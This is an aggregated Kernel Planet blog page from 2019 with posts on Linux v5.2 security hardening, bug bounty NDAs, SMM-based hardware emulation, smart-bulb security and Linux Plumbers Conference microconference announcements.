Kernel Planet

July 18, 2019

Kees Cook: security things in Linux v5.2

Previously: v5.1.

Linux kernel v5.2 was released last week! Here are some security-related things I found interesting:

page allocator freelist randomization
While the SLUB and SLAB allocator freelists have been randomized for a while now, the overarching page allocator itself wasn’t. This meant that anything allocating pages outside of kmem_cache/kmalloc() would have deterministic placement in memory. This is bad both for security and for some cache management cases. Dan Williams implemented this randomization, available under CONFIG_SHUFFLE_PAGE_ALLOCATOR, which provides additional uncertainty to memory layouts, though at a rather low granularity of 4MB (see SHUFFLE_ORDER). Also note that this feature needs to be enabled at boot time with page_alloc.shuffle=1 unless you have direct-mapped memory-side-cache (you can check the state at /sys/module/page_alloc/parameters/shuffle).

stack variable initialization with Clang
Alexander Potapenko added support via CONFIG_INIT_STACK_ALL for Clang’s -ftrivial-auto-var-init=pattern option that enables automatic initialization of stack variables. This provides even greater coverage than the prior GCC plugin for stack variable initialization, as Clang’s implementation also covers variables not passed by reference. (In theory, the kernel build should still warn about these instances, but even if they exist, Clang will initialize them.) Another notable difference between the GCC plugins and Clang’s implementation is that Clang initializes with a repeating 0xAA byte pattern, rather than zero. (Though this changes under certain situations, like for 32-bit pointers which are initialized with 0x000000AA.) As with the GCC plugin, the benefit is that the entire class of uninitialized stack variable flaws goes away.
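
For illustration, here is a minimal sketch of the bug class this closes (the function and helper names are hypothetical):

/* "err" is only assigned on some paths, so on the forgotten path it
 * would otherwise hold whatever stale data was left on the stack.
 * With -ftrivial-auto-var-init=pattern, Clang fills it with the
 * repeating 0xAA pattern at function entry, so nothing is leaked and
 * the bug fails loudly and predictably instead. */
static long example_ioctl(unsigned int cmd, unsigned long arg)
{
	long err;	/* uninitialized unless a case below assigns it */

	switch (cmd) {
	case 0x1234:
		err = example_do_something(arg);	/* hypothetical helper */
		break;
	/* a forgotten default case leaves "err" untouched... */
	}

	return err;	/* ...and would leak stack contents to the caller */
}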

Kernel Userspace Access Prevention on powerpc
Following SMAP on x86 and PAN on ARM, Michael Ellerman and Russell Currey have landed support for Kernel Userspace Access Prevention (KUAP), which disallows kernel access to userspace without explicit markings, on Power9 and later PPC CPUs under CONFIG_PPC_RADIX_MMU=y (which is the default). This is the continuation of the kernel userspace execution prevention (KUEP) that landed in v4.10. Now if an attacker tries to trick the kernel into any kind of unexpected access to userspace (not just executing code), the kernel will fault.
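
To make the distinction concrete, here is a hedged sketch (the helper is hypothetical; copy_from_user() is the real interface):

#include <linux/uaccess.h>

static long example_get_user_flag(int __user *uptr, int *flag)
{
	/* Wrong under KUAP: a direct load through the user pointer,
	 * e.g. "*flag = *uptr;", now faults, since user access was
	 * never explicitly enabled. */

	/* Right: copy_from_user() explicitly opens a user-access
	 * window just around the copy and closes it afterward. */
	if (copy_from_user(flag, uptr, sizeof(*flag)))
		return -EFAULT;

	return 0;
}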

Microarchitectural Data Sampling mitigations on x86
Another set of cache memory side-channel attacks came to light, and were consolidated together under the name Microarchitectural Data Sampling (MDS). MDS is weaker than other cache side-channels (less control over target address), but memory contents can still be exposed. Much like L1TF, when one’s threat model includes untrusted code running under Symmetric Multi Threading (SMT: more logical cores than physical cores), the only full mitigation is to disable hyperthreading (boot with “nosmt”). For all the other variations of the MDS family, Andi Kleen (and others) implemented various flushing mechanisms to avoid cache leakage.

unprivileged userfaultfd sysctl knob
Both FUSE and userfaultfd provide attackers with a way to stall a kernel thread in the middle of memory accesses from userspace by initiating an access on an unmapped page. While FUSE is usually behind some kind of access controls, userfaultfd hadn’t been. To avoid things like Use-After-Free heap grooming, Peter Xu added the new “vm.unprivileged_userfaultfd” sysctl knob to disallow unprivileged access to the userfaultfd syscall.
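
As a rough userspace illustration of what the knob changes (assuming your libc headers provide __NR_userfaultfd):

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
	/* With vm.unprivileged_userfaultfd=0, this fails with EPERM
	 * for processes lacking the required privilege. */
	long fd = syscall(__NR_userfaultfd, 0);

	if (fd < 0)
		printf("userfaultfd: %s\n", strerror(errno));
	else
		printf("userfaultfd allowed, fd=%ld\n", fd);
	return 0;
}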

temporary mm for text poking on x86
The kernel regularly performs self-modification with things like text_poke() (during stuff like alternatives, ftrace, etc). Before, this was done with fixed mappings (“fixmap”) where a specific fixed address at the high end of memory was used to map physical pages as needed. However, this resulted in some temporal risks: other CPUs could write to the fixmap, or there might be stale TLB entries on removal that other CPUs might still be able to write through to change the target contents. Instead, Nadav Amit has created a separate memory map for kernel text writes, as if the kernel is trying to make writes to userspace. This mapping ends up staying local to the current CPU, and the poking address is randomized, unlike the old fixmap.
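
A simplified conceptual sketch of the new flow (the map/unmap helpers here are stand-ins for the actual page-table manipulation; treat the whole thing as illustrative rather than the exact kernel code):

static void example_text_poke(void *addr, const void *opcode, size_t len)
{
	temp_mm_state_t prev;

	prev = use_temporary_mm(poking_mm);		/* CPU-local mapping context */
	example_map_writable(poking_addr, addr);	/* hypothetical helper */
	memcpy((void *)poking_addr, opcode, len);	/* write via the alias */
	example_unmap(poking_addr);			/* flush the local TLB entry */
	unuse_temporary_mm(prev);		/* other CPUs never saw the mapping */
}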

ongoing: implicit fall-through removal
Gustavo A. R. Silva is nearly done with marking (and fixing) all the implicit fall-through cases in the kernel. Based on the pull request from Gustavo, it looks very much like v5.3 will see -Wimplicit-fallthrough added to the global build flags and then this class of bug should stay extinct in the kernel.
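
For anyone who hasn’t followed the effort, the markings look roughly like this (a hypothetical example; GCC’s -Wimplicit-fallthrough accepts a “fall through” comment or attribute as the explicit annotation):

static int example_dispatch(struct example_dev *dev, int cmd)
{
	switch (cmd) {
	case EXAMPLE_CMD_RESET:
		example_reset(dev);	/* hypothetical helpers */
		/* fall through */	/* intentional: reset implies start */
	case EXAMPLE_CMD_START:
		return example_start(dev);
	default:
		return -EINVAL;
	}
}

Without that comment, the warning flags the RESET case, catching the many places where the fall-through was a genuine missing break.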

That’s it for now; let me know if you think I should add anything here. We’re almost to -rc1 for v5.3!

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

July 18, 2019 12:07 AM

July 17, 2019

Linux Plumbers Conference: System Boot and Security Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the System Boot and Security Microconference has been accepted into the 2019 Linux Plumbers Conference! Computer-system security has gotten a lot of serious attention over the years, but nowhere near as much attention has been paid to the system firmware, even though firmware is also a target for those looking to wreak havoc on our systems. Firmware is now being developed with security in mind, but the solutions so far are incomplete. This microconference will focus on the security of the system, especially from the moment it is powered on.

Expected topics for this year include:

Come and join us in the discussion of keeping your system secure even at boot up.

We hope to see you there!

July 17, 2019 04:57 PM

July 10, 2019

Linux Plumbers Conference: Power Management and Thermal Control Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Power Management and Thermal Control Microconference has been accepted into the 2019 Linux Plumbers Conference! Power management and thermal control are important areas in the Linux ecosystem, not least for reducing the environmental footprint of computing. In recent years, computer systems have become more complex and more thermally challenged at the same time, and the energy-efficiency expectations placed on them have been growing. This trend is likely to continue in the foreseeable future, despite the progress made in the power-management and thermal-control problem space since last year's Linux Plumbers Conference. That progress includes, but is not limited to, the merging of the energy-aware scheduling patch series and CPU idle-time management improvements; there will be more work to do in those areas. This gathering will focus on continuing to have Linux meet the power-management and thermal-control challenge.

Topics for this year include:

Come and join us in the discussion of how to extend the battery life of your laptop while keeping it cool.

We hope to see you there!

July 10, 2019 10:29 PM

July 09, 2019

Linux Plumbers Conference: Android Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Android Microconference has been accepted into the 2019 Linux Plumbers Conference! Android has a long history at Linux Plumbers and has continually made progress as a direct result of these meetings. This year’s focus will be a fairly ambitious goal to create a Generic Kernel Image (GKI) (or one kernel to rule them all!). Having a GKI will allow silicon vendors to be independent of the Linux kernel running on the device. As such, kernels could be easily upgraded without requiring any rework of the initial hardware porting efforts. This microconference will also address areas that have been discussed in the past.

The proposed topics include:

Come and join us in the discussion of improving what is arguably the most popular operating system in the world!

We hope to see you there!

July 09, 2019 11:29 PM

Matthew Garrett: Bug bounties and NDAs are an option, not the standard

Zoom had a vulnerability that allowed users on MacOS to be connected to a video conference with their webcam active simply by visiting an appropriately crafted page. Zoom's response has largely been to argue that:

a) There's a setting you can toggle to disable the webcam being on by default, so this isn't a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience and so they were justified in working around this (and so introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they'd only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom's decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we'd presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award - being able to give a presentation on the vulnerability at a high profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can't sign such an NDA - they may have discovered the issue on work time, and employer policies may prohibit them doing so.

Zoom are correct that it's not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they're giving you an opportunity to have the issue fixed before the public knows about it. They've done something they didn't need to do - they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn't - they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that's great. If you want to tie strings to that money, that's a choice you can make - but there's no reason for them to agree to those strings, and if they choose not to then you don't get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they're acting in accordance with widely accepted norms. If you're not able to fix an issue within 90 days, that's very much your problem.

If your bug bounty requires people sign an NDA, you should think about why. If it's so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you're offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information and compare that to the reputational damage you'll take from people deciding that it's not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before committing to a specific $ amount - it's never reasonable to ask that someone sign away their rights without knowing exactly what they're getting in return.

tl;dr - a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that's entirely within industry norms. Remember that a bargain is being struck here - you offering money isn't being generous, it's you attempting to provide an incentive for people to help you improve your security. If you're asking people to give up more than you're offering in return, don't be surprised if they say no.


July 09, 2019 09:15 PM

Linux Plumbers Conference: Update on LPC 2019 registration waiting list

Here is an update regarding the registration situation for LPC2019.

The considerable interest in participation this year meant that the conference sold out earlier than ever before.

Instead of a small release of late-registration spots, the LPC planning committee has decided to run a waiting list, which will be used as the exclusive method for additional registrations. As spots become available, the planning committee will reach out to individuals on the waiting list and invite them to register at the regular rate of $550.

With the Call for Proposals (CfP) still largely open, it is not yet possible to release passes. The planning committee and microconference leads are working together to allocate the passes earmarked for microconferences. Speakers for the Networking Summit and Kernel Summit have also yet to be confirmed.

The planning committee understands that many of those who added themselves to the waiting list wish to find out soon whether they will be issued a pass. We anticipate that the first passes will be released on July 22nd at the earliest.

Please follow us on social media, or here on this blog for further updates.

July 09, 2019 01:36 AM

July 08, 2019

Linux Plumbers Conference: VFIO/IOMMU/PCI Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the VFIO/IOMMU/PCI Microconference has been accepted into the 2019 Linux Plumbers Conference!

The PCI interconnect specification and the devices implementing it are incorporating more and more features aimed at high-performance systems. This requires the kernel to coordinate the PCI devices, the IOMMUs they are connected to, and the VFIO layer used to manage them (for userspace access and device pass-through) so that users and virtual machines can use them effectively. The kernel interfaces to control PCI devices have to be designed in sync for all three subsystems, which means the design of the VFIO/IOMMU/PCI kernel control paths intersects heavily, requiring code-design discussions that involve all three subsystems at once.

A successful VFIO/IOMMU/PCI Microconference was held at Linux Plumbers in 2017, where:

This year, the microconference will follow up on the previous microconference agendas and focus on ongoing patches review/design aimed at VFIO/IOMMU/PCI subsystems.

Topics for this year include:

Come and join us in the discussion in helping Linux keep up with the new features being added to the PCI interconnect specification.

We hope to see you there!

July 08, 2019 05:56 PM

July 07, 2019

Matthew Garrett: Creating hardware where no hardware exists

The laptop industry was still in its infancy back in 1990, but it already faced the core problem we still wrestle with today - power and thermal management are hard, but also critical to a good user experience (and potentially to the lifespan of the hardware). These were the days when DOS and Windows had no memory protection, so handling these problems at the OS level would have been an invitation for someone to overwrite your management code and potentially kill your laptop. The safe option was pushing all of this out to an external management controller of some sort, but vendors in the 90s were the same as vendors now and would do basically anything to avoid having to drop an extra chip on the board. Thankfully(?), Intel had a solution.

The 386SL was released in October 1990 as a low-powered mobile-optimised version of the 386. Critically, it included a feature that let vendors ensure that their power management code could run without OS interference. A small window of RAM was hidden behind the VGA memory[1] and the CPU configured so that various events would cause the CPU to stop executing the OS and jump to this protected region. It could then do whatever power or thermal management tasks were necessary and return control to the OS, which would be none the wiser. Intel called this System Management Mode, and we've never really recovered.

Step forward to the late 90s. USB is now a thing, but even the operating systems that support USB usually don't in their installers (and plenty of operating systems still didn't have USB drivers). The industry needed a transition path, and System Management Mode was there for them. By configuring the chipset to generate a System Management Interrupt (or SMI) whenever the OS tried to access the PS/2 keyboard controller, the CPU could then trap into some SMM code that knew how to talk to USB, figure out what was going on with the USB keyboard, fake up the results and pass them back to the OS. As far as the OS was concerned, it was talking to a normal keyboard controller - but in reality, the "hardware" it was talking to was entirely implemented in software on the CPU.

Since then we've seen even more stuff get crammed into SMM, which is annoying because in general it's much harder for an OS to do interesting things with hardware if the CPU occasionally stops in order to run invisible code to touch hardware resources you were planning on using, and that's even ignoring the fact that operating systems in general don't really appreciate the entire world stopping and then restarting some time later without any notification. So, overall, SMM is a pain for OS vendors.

Change of topic. When Apple moved to x86 CPUs in the mid 2000s, they faced a problem. Their hardware was basically now just a PC, and that meant people were going to try to run their OS on random PC hardware. For various reasons this was unappealing, and so Apple took advantage of the one significant difference between their platforms and generic PCs. x86 Macs have a component called the System Management Controller that (ironically) seems to do a bunch of the stuff that the 386SL was designed to do on the CPU. It runs the fans, it reports hardware information, it controls the keyboard backlight, it does all kinds of things. So Apple embedded a string in the SMC, and the OS tries to read it on boot. If it fails, so does boot[2]. Qemu has a driver that emulates enough of the SMC that you can provide that string on the command line and boot OS X in qemu, something that's documented further here.

What does this have to do with SMM? It turns out that you can configure x86 chipsets to trap into SMM on arbitrary IO port ranges, and older Macs had SMCs in IO port space[3]. After some fighting with Intel documentation[4] I had Coreboot's SMI handler responding to writes to an arbitrary IO port range. With some more fighting I was able to fake up responses to reads as well. And then I took qemu's SMC emulation driver and merged it into Coreboot's SMM code. Now, accesses to the IO port range that the SMC occupies on real hardware generate SMIs, trap into SMM on the CPU, run the emulation code, handle writes, fake up responses to reads and return control to the OS. From the OS's perspective, this is entirely invisible[5]. We've created hardware where none existed.

The tree where I'm working on this is here, and I'll see if it's possible to clean this up in a reasonable way to get it merged into mainline Coreboot. Note that this only handles the SMC - actually booting OS X involves a lot more, but that's something for another time.

[1] If the OS attempts to access this range, the chipset directs it to the video card instead of to actual RAM.
[2] It's actually more complicated than that - see here for more.
[3] IO port space is a weird x86 feature where there's an entire separate IO bus that isn't part of the memory map and which requires different instructions to access. It's low performance but also extremely simple, so hardware that has no performance requirements is often implemented using it.
[4] Some current Intel hardware has two sets of registers defined for setting up which IO ports should trap into SMM. I can't find anything that documents what the relationship between them is, but if you program the obvious ones nothing happens and if you program the ones that are hidden in the section about LPC decoding ranges things suddenly start working.
[5] Eh technically a sufficiently enthusiastic OS could notice that the time it took for the access to occur didn't match what it should on real hardware, or could look at the CPU's count of the number of SMIs that have occurred and correlate that with accesses, but good enough


July 07, 2019 08:15 PM

Linux Plumbers Conference: Scheduler Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Scheduler Microconference has been accepted into the 2019 Linux Plumbers Conference! The scheduler determines what runs on the CPU at any given time - the responsiveness of your desktop, for example, depends on it. There are a few different scheduling classes for a user to choose from, such as the default class (SCHED_OTHER) or the real-time classes (SCHED_FIFO, SCHED_RR and SCHED_DEADLINE). The deadline scheduler is the newest and allows the user to control the amount of bandwidth received by a task or group of tasks. With cloud computing becoming popular these days, controlling the bandwidth of containers or virtual machines is becoming more important. The Real-Time patch is also destined to become mainline, which will add more strain on the scheduling of tasks to make sure that real-time tasks make their deadlines (although this Microconference will focus on non-real-time aspects of the scheduler; please defer real-time topics to the Real-time Microconference). This requires verification techniques to ensure the scheduler is properly designed.

Topics for this year include:

Come and join us in the discussion of controlling what tasks get to run on your machine and when.

We hope to see you there!

July 07, 2019 02:51 PM

July 03, 2019

Linux Plumbers Conference: RDMA Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the RDMA Microconference has been accepted into the 2019 Linux Plumbers Conference! RDMA has been a microconference at Plumbers for the last three years and will be continuing its productive work for a fourth year. The RDMA meetings at the previous Plumbers have been critical in getting improvements to the RDMA subsystem merged into mainline. These include a new user API, container support, testability/syzkaller, system bootup, Soft iWarp, and more. There are still difficult open issues that need to be resolved, and this year’s Plumbers RDMA Microconference is sure to come up with answers to these tough problems.

Topics for this year include:

And new developing areas of interest:

Come and join us in the discussion of improving Linux’s ability to access direct memory across high-speed networks.

We hope to see you there!

July 03, 2019 10:54 PM

July 02, 2019

Linux Plumbers Conference: Announcing the LPC 2019 registration waiting list


The current pool of registrations for the 2019 Linux Plumbers Conference has sold out.

Those not yet registered who wish to attend should fill out the form here to get on the waiting list.

As registration spots open up, the Plumbers organizing committee will allocate them to those on the waiting list, with priority given to those who will be participating in microconferences and BoFs.


July 02, 2019 07:22 PM

Linux Plumbers Conference: Preliminary schedule for LPC 2019 has been published

The LPC committee is pleased to announce the preliminary schedule for the 2019 Linux Plumbers Conference.

The vast majority of the LPC refereed track talks have been accepted and are listed there. The same is true for microconferences. While there are a few talks and microconferences to be announced, you will find the current overview LPC schedule here. The LPC refereed track talks can be seen here.

The call for proposals (CfP) is still open for the Kernel Summit, Networking Summit, BOFs and topics for accepted microconferences.

As new microconferences, talks, and BOFs are accepted, they will be published to the schedule.

July 02, 2019 04:48 PM

June 30, 2019

Matthew Garrett: Which smart bulbs should you buy (from a security perspective)

People keep asking me which smart bulbs they should buy. It's a great question! As someone who has, for some reason, ended up spending a bunch of time reverse engineering various types of lightbulb, I'm probably a reasonable person to ask. So. There are four primary communications mechanisms for bulbs: wifi, bluetooth, zigbee and zwave. There are basically zero compelling reasons to care about zwave, so I'm not going to.

Wifi


Advantages: Doesn't need an additional hub - you can just put the bulbs wherever. The bulbs can connect out to a cloud service, so you can control them even if you're not on the same network.
Disadvantages: Only works if you have wifi coverage, each bulb has to have wifi hardware and be configured appropriately.
Which should you get: If you search Amazon for "wifi bulb" you'll get a whole bunch of cheap bulbs. Don't buy any of them. They're mostly based on a custom protocol from Zengge and they're shit. Colour reproduction is bad, there's no good way to use the colour LEDs and the white LEDs simultaneously, and if you use any of the vendor apps they'll proxy your device control through a remote server with terrible authentication mechanisms. Just don't. The ones that aren't Zengge are generally based on the Tuya platform, whose security model is to have keys embedded in some incredibly obfuscated code and hope that nobody can find them. TP-Link make some reasonably competent bulbs but also use a weird custom protocol with hand-rolled security. Eufy are fine but again there's weird custom security. Lifx are the best bulbs, but have zero security on the local network - anyone on your wifi can control the bulbs. If that's something you care about then they're a bad choice, but also if that's something you care about maybe just don't let people you don't trust use your wifi.
Conclusion: If you have to use wifi, go with lifx. Their security is not meaningfully worse than anything else on the market (and they're better than many), and they're better bulbs. But you probably shouldn't go with wifi.

Bluetooth


Advantages: Doesn't need an additional hub. Doesn't need wifi coverage. Doesn't connect to the internet, so remote attack is unlikely.
Disadvantages: Only one control device at a time can connect to a bulb, so harder to share. Control device needs to be in Bluetooth range of the bulb. Doesn't connect to the internet, so you can't control your bulbs remotely.
Which should you get: Again, most Bluetooth bulbs you'll find on Amazon are shit. There's a whole bunch of weird custom protocols and the quality of the bulbs is just bad. If you're going to go with anything, go with the C by GE bulbs. Their protocol is still some AES-encrypted custom binary thing, but they use a Bluetooth controller from Telink that supports a mesh network protocol. This means that you can talk to any bulb in your network and still send commands to other bulbs - the dual advantages here are that you can communicate with bulbs that are outside the range of your control device and also that you can have as many control devices as you have bulbs. If you've bought into the Google Home ecosystem, you can associate them directly with a Home and use Google Assistant to control them remotely. GE also sell a wifi bridge - I have one, but haven't had time to review it yet, so I'll make no assertions about its competence. The colour bulbs are also disappointing, with much dimmer colour output than white output.

Zigbee


Advantages: Zigbee is a mesh protocol, so bulbs can forward messages to each other. The bulbs are also pretty cheap. Zigbee is a standard, so you can obtain bulbs from several vendors that will then interoperate - unfortunately there are actually two separate standards for Zigbee bulbs, and you'll sometimes find yourself with incompatibility issues there.
Disadvantages: Your phone doesn't have a Zigbee radio, so you can't communicate with the bulbs directly. You'll need a hub of some sort to bridge between IP and Zigbee. The ecosystem is kind of a mess, and you may have weird incompatibilities.
Which should you get: Pretty much every vendor that produces Zigbee bulbs also produces a hub for them. Don't get the Sengled hub - anyone on the local network can perform arbitrary unauthenticated command execution on it. I've previously recommended the Ikea Tradfri, which at the time only had local control. They've since added remote control support, and I haven't investigated that in detail. But overall, I'd go with the Philips Hue. Their colour bulbs are simply the best on the market, and their security story seems solid - performing a factory reset on the hub generates a new keypair, and adding local control users requires a physical button press on the hub to allow pairing. Using the Philips hub doesn't tie you into only using Philips bulbs, but right now the Philips bulbs tend to be as cheap (or cheaper) than anything else.

But what about


If you're into tying together all kinds of home automation stuff, then either go with Smartthings or roll your own with Home Assistant. Both are definitely more effort if you only want lighting.

My priority is software freedom


Excellent! There are various bulbs that can run the Espurna or AiLight firmwares, but you'll have to deal with flashing them yourself. You can tie that into Home Assistant and have a completely free stack. If you're ok with your bulbs being proprietary, Home Assistant can speak to most types of bulb without an additional hub (you'll need a supported Zigbee USB stick to control Zigbee bulbs), and will support the C by GE ones as soon as I figure out why my Bluetooth transmissions stop working every so often.

Conclusion


Outside niche cases, just buy a Hue. Philips have done a genuinely good job. Don't buy cheap wifi bulbs. Don't buy a Sengled hub.

(Disclaimer: I mentioned a Google product above. I am a Google employee, but do not work on anything related to Home.)


June 30, 2019 08:10 PM

June 26, 2019

Linux Plumbers Conference: Databases Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Databases Microconference has been accepted into the 2019 Linux Plumbers Conference! Linux plumbing is critically important to those who implement databases and to their users, who expect fast and durable data handling.

Durability is a promise never to lose data after advising a user of a successful update, even in the face of power loss. It requires a full-stack solution from the application to the database, then to Linux (filesystem, VFS, block interface, driver), and on to the hardware.

Fast means getting a database user a response in less than tens of milliseconds, which requires that Linux filesystems, memory and CPU management, and the networking stack do everything with the utmost effectiveness and efficiency.

For all Linux users, there is a benefit in having database developers interact with system developers; it will ensure that the promises of durability and speed are both kept as newer hardware technologies emerge, existing CPU/RAM resources grow, and the data being stored grows even faster.

Topics for this Microconference include:

Come and join us in the discussion about making databases run smoother and faster.

We hope to see you there!

June 26, 2019 03:14 PM

June 25, 2019

James Morris: Linux Security Summit North America 2019: Schedule Published

The schedule for the 2019 Linux Security Summit North America (LSS-NA) is published.

This year, there are some changes to the format of LSS-NA. The summit runs for three days instead of two, which allows us to relax the schedule somewhat while also adding new session types.  In addition to refereed talks, short topics, BoF sessions, and subsystem updates, there are now also tutorials (one each day), unconference sessions, and lightning talks.

The tutorial sessions are:

These tutorials will be 90 minutes in length, and they’ll run in parallel with unconference sessions on the first two days (when the space is available at the venue).

The refereed presentations and short topics cover a range of Linux security topics including platform boot security, integrity, container security, kernel self protection, fuzzing, and eBPF+LSM.

Some of the talks I’m personally excited about include:

The schedule last year was pretty crammed, so with the addition of the third day we’ve been able to avoid starting early, and we’ve also added five minute transitions between talks. We’re hoping to maximize collaboration via the more relaxed schedule and the addition of more types of sessions (unconference, tutorials, lightning talks). This is not a conference for simply consuming talks, but one for participating and getting things done (or started).

Thank you to all who submitted proposals.  As usual, we had many more submissions than can be accommodated in the available time.

Also thanks to the program committee, who spent considerable time reviewing and discussing proposals, and working out the details of the schedule. The committee for 2019 is:

  • James Morris (Microsoft)
  • Serge Hallyn (Cisco)
  • Paul Moore (Cisco)
  • Stephen Smalley (NSA)
  • Elena Reshetova (Intel)
  • John Johansen (Canonical)
  • Kees Cook (Google)
  • Casey Schaufler (Intel)
  • Mimi Zohar (IBM)
  • David A. Wheeler (Institute for Defense Analyses)

And of course many thanks to the event folk at Linux Foundation, who handle all of the logistics of the event.

LSS-NA will be held in San Diego, CA on August 19-21. To register, click here. Or you can register for the co-located Open Source Summit and add LSS-NA.


June 25, 2019 08:43 PM

June 19, 2019

Linux Plumbers Conference: Real-Time Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Real-Time Microconference has been accepted into the 2019 Linux Plumbers Conference! The PREEMPT_RT patch set (aka “The Real-Time Patch”) was created in 2004 in an effort to turn Linux into a hard real-time operating system. Over the years much of the RT patch has made it into mainline Linux, including mutexes, lockdep, high-resolution timers, Ftrace, RCU_PREEMPT, priority inheritance, threaded interrupts and much more. There’s just a little left to get RT fully into mainline, and the light at the end of the tunnel is finally in view. It is expected that the RT patch will be in mainline within a year, which changes the topics of discussion: once it is in Linus’s tree, a whole new set of issues must be handled. The focus of this year’s event will include:

Come and join us in the discussion of making the LWN prediction of RT coming into mainline “this year” a reality!

We hope to see you there!

June 19, 2019 10:55 PM

Linux Plumbers Conference: Testing and Fuzzing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Testing and Fuzzing Microconference has been accepted into the 2019 Linux Plumbers Conference! Testing and fuzzing are crucial to the stability that the Linux kernel demands.

Last year’s microconference brought about a number of discussions; for example, syzkaller evolved into syzbot, which keeps track of fuzzing efforts and the resulting fixes. The closing ceremony pointed out all the work that still has to be done: there are a number of overlapping efforts that need to be consolidated, the use of KASAN should be increased, and the unit-testing frameworks may need some unification. Where is fuzzing going next? With real-time moving forward from “if” to “when” in mainline, how does RT test coverage increase? Also, KernelCI will be announced as an LF project this time around. Stay around for the KernelCI hackathon after the conference to help further those efforts.

Come and join us for the discussion!

We hope to see you there!

June 19, 2019 02:29 AM

June 17, 2019

Linux Plumbers Conference: Toolchains Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Toolchains Microconference has been accepted into the 2019 Linux Plumbers Conference! The Linux kernel may be one of the most powerful systems around, but it takes a powerful toolchain to make that happen. The kernel takes advantage of any feature that the toolchains provide, and collaboration between kernel and toolchain developers will make that much more seamless.

Toolchains topics will include:

Come and join us in the discussion of what makes it possible to build the most robust and flexible kernel in the world!

We hope to see you there!

June 17, 2019 06:10 PM

June 15, 2019

Greg Kroah-Hartman: Linux stable tree mirror at github

As everyone seems to like to put kernel trees up on github for random projects (based on the crazy notifications I get all the time), I figured it was time to put up a semi-official mirror of all of the stable kernel releases on github.com

It can be found at: https://github.com/gregkh/linux and I will try to keep it up to date with the real source of all kernel stable releases at https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/

It differs from Linus’s tree at: https://github.com/torvalds/linux in that it contains all of the different stable tree branches and stable releases and tags, which many devices end up building on top of.

So, mirror away!

Also note, this is a read-only mirror, any pull requests created on it will be gleefully ignored, just like happens on Linus’s github mirror.

If people think this is needed on any other git hosting site, just let me know and I will be glad to push to other places as well.

This notification was also cross-posted on the new http://people.kernel.org/ site, go follow that for more kernel developer stuff.

June 15, 2019 08:10 PM

June 14, 2019

Linux Plumbers Conference: Open Printing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Open Printing Microconference has been accepted into the 2019 Linux Plumbers Conference! In today’s world much is done online, but getting a hardcopy is still very much needed - as is scanning a hardcopy to make it digital. All of this needs to work well on Linux to keep Linux-based and open source operating systems relevant. Fortunately, with the progress in technology, using modern printers and scanners is becoming simpler: the driverless concept makes printing and scanning work with a few simple clicks, without requiring the user to install any driver software. The Open Printing organization has been tasked with getting this job done. This Microconference will focus on what needs to be accomplished to keep Linux and open source operating systems a leader in today’s market.

Topics for this Microconference include:

Come and join us in the discussion of keeping your printers working.

We hope to see you there!

June 14, 2019 03:18 PM

June 13, 2019

Linux Plumbers Conference: Live Patching Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Live Patching Microconference has been accepted into the 2019 Linux Plumbers Conference! Some workloads require 100% uptime, so rebooting for maintenance is not an option - but that can leave the system insecure, as new vulnerabilities may have been discovered in the running kernel. Live kernel patching is a technique to update the kernel without taking down the machine. As one can imagine, patching a running kernel is far from trivial, and although it is being used in production today[1][2], there are still many issues that need to be solved.

These include:

Come and join us in the discussion about changing your running kernel without having to take it down!

We hope to see you there!

June 13, 2019 08:19 PM

June 12, 2019

Linux Plumbers Conference: You, Me and IoT Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the You, Me and IoT Microconference has been accepted into the 2019 Linux Plumbers Conference! IoT is becoming an integral part of our daily lives, controlling devices such as on/off switches, temperature controls, door and window sensors and so much more. But the technology itself requires a lot of infrastructure and communication frameworks, such as Zigbee, OpenHAB and 6LoWPAN. Open source real-time embedded operating systems like Zephyr also come into play. Greybus, a completely open source framework implementation, has already made it into staging. Discussions will be around Greybus:

– Device management
– Abstracted devices
– Management of Unique IDs
– Network management
– Userspace utilities
